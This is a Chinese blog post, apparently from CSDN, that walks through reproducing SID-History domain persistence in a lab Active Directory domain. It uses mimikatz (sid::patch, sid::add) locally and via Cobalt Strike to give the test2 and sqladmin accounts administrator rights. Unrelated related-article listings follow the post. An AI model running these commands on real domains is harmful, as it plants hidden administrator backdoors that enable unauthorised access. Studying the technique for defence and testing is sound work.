权限维持 SID-history

最新推荐文章于 2024-09-17 21:39:20 发布
最新推荐文章于 2024-09-17 21:39:20 发布
阅读量100 收藏 1
点赞数 1
分类专栏: 内网 文章标签: 服务器 运维 经验分享 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64815693/article/details/130912801
版权

前言

首先我们都知道在linux中有一个uid的值,用来区分用户组,在windows也有一个sid的值,和linux那个很像的,我们可以设置一个恶意用户的sid值为管理员,让他可以直接访问域控。

注:限域环境

复现

1.本地

首先我们查看我新建的test2用户,看到SID值最后是1178证明,他是一个普通用户,然后下面的SIDHistrory的值是空,我们就是要设置SIDHistrory为管理员的sid

powershell -ExecutionPolicy Bypass -Command "& {Import-Module ActiveDirectory; Get-ADUser test2 -Properties sidhistory}"

这里我们还是使用mimikatz,注意用户名修改为自己要实验的用户名,这里看到回显的信息,我们知道他设置了sidhistory的值。

mimikatz.exe "privilege::debug" "sid::patch" "sid::add /sam:test2 /new:administrator" "exit"

这里我们再次查看发现test2的SIDHistory值是管理员了,这里登录到test2看看是否有权限

果然如我们所料,直接有权限可以操纵目录

 2.cs使用

当然不止是可以修改新建用户,也可以搞一些域内的成员,还是先查看一下

shell powershell -ExecutionPolicy Bypass -Command "& {Import-Module ActiveDirectory; Get-ADUser sqladmin -Properties sidhistory}"

然后给sqladmin管理员权限,这里可以看到成功了

mimikatz privilege::debug 
mimikatz sid::patch
mimikatz sid::add /sam:sqladmin /new:administrator

这里用上线的sqladmin看看可以查看域控的目录 ,这里可以看到是有权限了

SID History权限维持
weixin_41082546的博客
05-05 596
一、简介   每个用户都有自己的SIDSID的作用主要是跟踪安全主体控制用户连接资源时的访问权限SID History是在域迁移过程中需要使用的一个属性。   如果A域中的域用户迁移到B域中,那么该用户的SID值就会改变,进而其权限也会改变。导致迁移后的用户无法访问以前可以访问的资源。SID History的作用是在域迁移过程中保持域用户的访问权限,如果迁移后用户的SID值改变,系统会将原...
内网渗透(六十九)之域权限维持SID History 滥用
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-12 783
SID是用于标识主体的可变长度的唯一值,每个账户都有一个系统颁发的唯一SID,其存储在数据库(域中的话就存储在活动目录数据库中)。用户每次登录时,系统都会从数据库中检索该用户的SID,并将其放在该用户的访问令牌中。系统使用访问令牌中的SID来识别与Windows安全所有后续交互中的用户。当SID被用作用户或组的唯一标识符时,他再也不能用于标识另一个用户或组。在活动目录数据库中对象的objectSid属性值就是SID
[内网渗透]—权限维持
Sentiment的博客
12-16 1776
当拿到域控权限后,使用mimikatz可以注入Skeleon Key,将 Skeleton Key 注入域控制器的 lsass.exe 进程,这样会在域内的所有账号中添加一个 Skeleton Key,而这个key是自己设定的所以可以随时共享访问。PS:由于注入到lsass.exe进程中,所以每次关机后就不存在了,但一般在真正的域环境中,域控在很长一段时间内是不会重启的,因此可以作为权限维持的一种方式。
域渗透 - 权限维持 SID History
whojoe的博客
08-03 430
域渗透 - 权限维持 SID History环境搭建SID History属性介绍利用条件利用同一个域内同一域树下的提权利用方式参考文章 环境搭建 这里需要父子域 可以参考 https://blog.csdn.net/qq_43645782/article/details/119330508 机器名 ip 用户 密码 dns fad.test.com 192.168.164.146 administrator Aa1234 192.168.164.146 cad.ch.test.com
domain SID History attributes
include_heqile的博客
10-29 445
原文链接 domain SID History attributes主要用来支持域的迁移 每一个域用户都有一个SID用于标识安全主体以及该用户对特定资源的访问权限SID History使得被克隆的用户可以访问之前用户能够访问的资源。这样就可以保证当一个用户迁移到另一个域中之后仍然可以访问以前所在域中的资源。 因为用户迁移到新的域之后,他的SID就会发生改变,所以需要将其原来的OLD SID映射...
SIDHistory属性的利用
热门推荐
Shanfenglan's blog
12-24 4万+
文章目录1. 前言2.对某用户的SIDHistory属性进行操作2.1 查询zhangsan的SIDHistory2.2 给zhangsan用户添加域管的sid2.3 删除zhangsan的SIDHistory属性3.利用思路3.1 权限维持3.2 利用当前用户的sidhistory属性防御方法 1. 前言 SIDHistory属性的存在是为了解决用户在迁移到另一个域中的时候权限会改变的问题。例如用户zhangsan在A域中本来是管理员,迁移到B域的时候因为sid的改变有可能会变成普通用户权限,这时候如果给
权限维持之:SID History 域控权限维持
f_carey的博客
12-18 954
权限维持之:SID History 域控权限维持1 SID 作用2 利用 SID History 操作过程3 SID History 权限维持的防御 1 SID 作用 ​ 每个用户都有自己的SIDSID的作用主要是跟踪安全主体控制用户连接资源时的访问权限SID History是在域迁移过程中需要使用的一个属性。 ​ 如果A域中的域用户迁移到B域中,那么该用户的SID值就会改变,进而其权限也会改变。导致迁移后的用户无法访问以前可以访问的资源。SID History的作用是在域迁移过程中保持域用户的访问权限
内网安全-权限维持-黄金白银票据维持&基于登录进程劫持-Skeleton Key&SID history&DSRM&SSP权限维持
weixin_45701675的博客
04-25 849
内网安全权限维持
内网渗透-域内的权限维持
lza20001103的博客
10-01 1033
域内的权限维持 文章目录域内的权限维持前言PTTTGT(黄金票据)sspSkeleton KeySID History后记 前言 上期我们讲了windows和Linux中的权限维持,这期我们讲一下域内的权限维持权限维持是后渗透必不可少的环节,大家一定要好好掌握啊。 PTT PTT(票据) window认证机制 http://note.youdao.com/noteshare?id=cb8c505af1c38b461be8e964e9825dca&sub=F271F9DD1A894C4188D1AE
域控权限持久化之SID History域后门
谢公子的博客
02-27 2028
每个用户都有自己的SIDSID的作用主要是跟踪安全主体控制用户连接资源时的访问权限SID History是在域迁移过程中需要使用的一个属性。 如果将A域中的域用户迁移到B域中,那么在B域中新建的用户的SID会随之改变,进而影响迁移后用户的权限,导致迁移后的用户不能访问本来可以访问的资源。SID History的作用是在域迁移过程中保持域用户的访问权限,即如果迁移后用户的SID改变了,系统会将...
域渗透|域权限维持SID History
weixin_42282189的博客
09-06 388
作者:r0n1n 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 SID的主要作用是跟踪安全主体控制用户连接资源时的访问权限SID History 是在域迁移过程中需要使用的一个属性,SID History 主要作用是在域迁移过程中保持域用户的访问权限,如果迁移后域用户的SID改变了,系统会将其原来的SID添加到迁移用户的SID History 属性中,使迁移后的用户保持原有的权限、能够访问其原来可以访问的资源。 因此使用mimikatz可以将SID His.
Linux 常用指令
最新发布
ZH_qaq的博客
09-17 1167
这是本人在备战 CSP 初赛做 Linux 指令题时,心血来潮整理的,希望对大家有帮助。如有错误或有补充,麻烦私信或评论指出。
Nginx搭建直播服务器,并用rtmp,http-flv,hls三种模式拉流观看直播的流程
桃花岛主的博客
09-17 311
是指推流的目录在live,hls on是指开启切片,hls_path: html/hls是指切片直播的目录,手动创建,hls_fragment:3,每3秒创建一个切片。我们这个nginx推流服务器的http地址是:http://localhost:8080。环境widows,并且已经集成了 :nginx-http-flv-module模块。注意是两个nginx,一个是8080,负责直播推流,80的负责播放。1、vlc播放:(有以下三种播放方式:)我们再开一个nginx,端口为:80,这样就播放出来了视频。
【观察】戴尔AI算力加速服务器“焕新上市”,打通AI落地行业“最后一公里”...
申耀的科技观察
09-12 567
今天,在人工智能的推动下,企业数智化转型已进入规模化“倍增创新”的阶段,尤其是以大模型为代表的AI技术加速演进,以及应用场景的不断拓展加深,都让各类AI创新应用如雨后春笋般涌现,并加速惠及千行万业。但与此同时,AI大模型的火热登场,也引爆了智能算力的需求。根据中国信通院发布的《中国算力发展指数白皮书(2023年)》显示,在目前的算力规模中,通用算力规模占比达74%,智能算力规模占比达25%,同比增...
chattr:修改文件的特殊属性
qq_38641599的博客
09-12 948
​chattr​命令用于改变文件的特殊属性,也称为"chattr 属性"。这些属性可以提供额外的安全性和控制,如设置文件为不可修改、只允许在文件末尾添加数据等。‍。
Linux5-echo,>,tail
2301_80339607的博客
09-15 409
选项-f,例如tail -f test.txt,实时跟踪(如果添加数据,这里立即显示,如果要退出追踪,按Ctrl+c)例如:echo "hello world",输出hello world。选项-num,例如tail -5 test.txt,查看末尾5行。echo 'pwd',输出pwd的位置。tail用于查看末尾内容,默认为末尾10行。echo是输出命令,类似printf。例如:tail test.txt。>指把左边内容覆盖到右边。>>把左边内容追加到右边。2.重定向符> >>
通过TensorBoard查看服务器训练过程
记录图像处理中遇到的点点滴滴
09-12 353
在本地查看服务器训练代码过程
运维的基本概念:服务器和网络基础知识
Echo_Wish的博客
09-12 1005
服务器和网络是现代IT系统的基础设施,运维工程师需要掌握这些基础知识,才能有效地管理和维护系统。希望本文能够帮助读者更好地理解运维的基本概念,并提供一些实用的服务器和网络管理示例。通过不断学习和实践,运维工程师可以提升自己的技能,为企业的IT系统保驾护航。
如何在Android上实现RTSP服务器
乐学吧
09-17 1515
Android上实现RTSP服务器是一个极具挑战的任务,功能设计这块,除了需要支持接编码前音视频数据外,还需要支持对接编码后音视频数据,并实现本地录像、快照等功能组合使用。需要注意的是,就像海康、大华的摄像头一样,对外的并发,一般限于4-8个,Android设备的性能一般来说,可能不足以处理高负载的RTSP服务器,但是小并发模式下,能稳定的运行,就达到设计初衷了。
SID-3YL微机涌流抑制器技术手册_V3.1
"SID-3YL涌流抑制器技术说明书_V3.1" SID-3YL涌流抑制器是一款专门设计用于抑制电力系统中因断路器操作引起的过电压和涌流的高性能设备。该抑制器基于两项发明专利,结合了前代产品的现场运行经验,旨在提高电力...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

练习两年半的篮球选..哦不对安全选手

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值